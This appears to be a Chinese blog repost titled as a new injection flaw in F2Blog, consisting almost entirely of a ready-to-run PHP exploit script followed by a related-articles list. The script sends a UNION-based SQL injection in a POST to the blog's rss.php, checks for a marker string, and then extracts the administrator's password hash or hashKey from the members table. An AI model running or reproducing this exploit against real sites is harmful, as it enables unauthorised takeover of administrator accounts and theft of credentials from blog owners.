• f2blog最新注射漏洞


    <?php print_r(" +------------------------------------------------------------------+ Exploit For F2Blog All Version Just For Fun :) +------------------------------------------------------------------+ "); ini_set("max_execution_time",0); error_reporting(7); $blogpath="$argv[2]"; $server="$argv[1]"; $cookie=''; $useragent="Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)"; $type=$argv[3]; $cmd="find=and 1=2 union select 0x7765206C6F7665207368656C6C,0x7765206C6F7665207368656C6C,0x7765206C6F7665207368656C6C,0x7765206C6F7665207368656C6C,0x7765206C6F7665207368656C6C,0x7765206C6F7665207368656C6C,0x7765206C6F7665207368656C6C,0x7765206C6F7665207368656C6C,0x7765206C6F7665207368656C6C from f2blog_members where role=0x61646D696E/*"; echo "Testting...:\t"; $response=send($cmd,'rss.php?cateID=1'); if(strpos($response,'we love shell')) { echo "Vul\r\n"; } echo "Now Crack the admin\r\n\r\n"; if($type==0){ $cmd="find=and 1=2 union select hashKey,hashKey,hashKey,hashKey,hashKey,hashKey,hashKey,hashKey,hashKey from f2blog_members where role=0x61646D696E/*"; $response=send($cmd,'rss.php?cateID=1'); preg_match_all('/\[CDATA\[(.+)\]\]/ie',$response,$matches); $matches=array_reverse($matches); $matches=array_reverse($matches[0]); if(is_hash($matches[0])) { echo "hash:\t"; die(print_r($matches[0])); } die("Exploit Failed\r\n"); } else{ $cmd="find=and 1=2 union select password,password,password,password,password,password,password,password,password from f2blog_members where role=0x61646D696E/*"; $response=send($cmd,'rss.php?cateID=1'); preg_match_all('/\[CDATA\[(.+)\]\]/ie',$response,$matches); $matches=array_reverse($matches); $matches=array_reverse($matches[0]); if(is_hash($matches[0])) { echo "password:\t"; die(print_r($matches[0])); } die("Exploit Failed\r\n"); } function is_hash($hash) { if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;} else {return false;} } function send($cmd,$path) { global $blogpath,$server,$cookie,$count,$useragent,$debug,$evilip; $path=$blogpath."$path"; $message = "POST ".$path." HTTP/1.1\r\n"; $message .= "Accept: */*\r\n"; $message .= "Accept-Language: zh-cn\r\n"; $message .= "Referer: http://".$server.$path."\r\n"; $message .= "Content-Type: application/x-www-form-urlencoded\r\n"; $message .= "User-Agent: ".$useragent."\r\n"; $message .= "Host: ".$server."\r\n"; $message .= "Content-length: ".strlen($cmd)."\r\n"; $message .= "Connection: Keep-Alive\r\n"; $message .= "Cookie: ".$cookie."\r\n"; $message .= "\r\n"; $message .= $cmd."\r\n"; // echo $message; $fd = fsockopen( $server, 80 ); fputs($fd,$message); $resp = "<pre>"; while($fd&&!feof($fd)) { $resp .= fread($fd,1024); } fclose($fd); $resp .="</pre>"; if($debug) {echo $cmd;echo $resp;} // echo $resp; return $resp; } ?>
  • 相关阅读:
    SQL SUBSTRING 函数
    JS复制DOM元素文字内容
    CSS中DIV只出现竖向滚动条且内容自动换行
    Windows下sc create命令行添加/创建/修改服务
    C# FTP删除文件以及文件夹
    涨薪20%!听听这位资深机器学习面试官的内心独白
    《Java从入门到放弃》JavaSE篇:程序结构
    迷茫的程序员
    技术与技术人员的价值
    GitChat·人工智能 | 除了深度学习,机器翻译还需要啥?
  • 原文地址:https://www.cnblogs.com/adodo1/p/4326997.html
Copyright © 2020-2023  润新知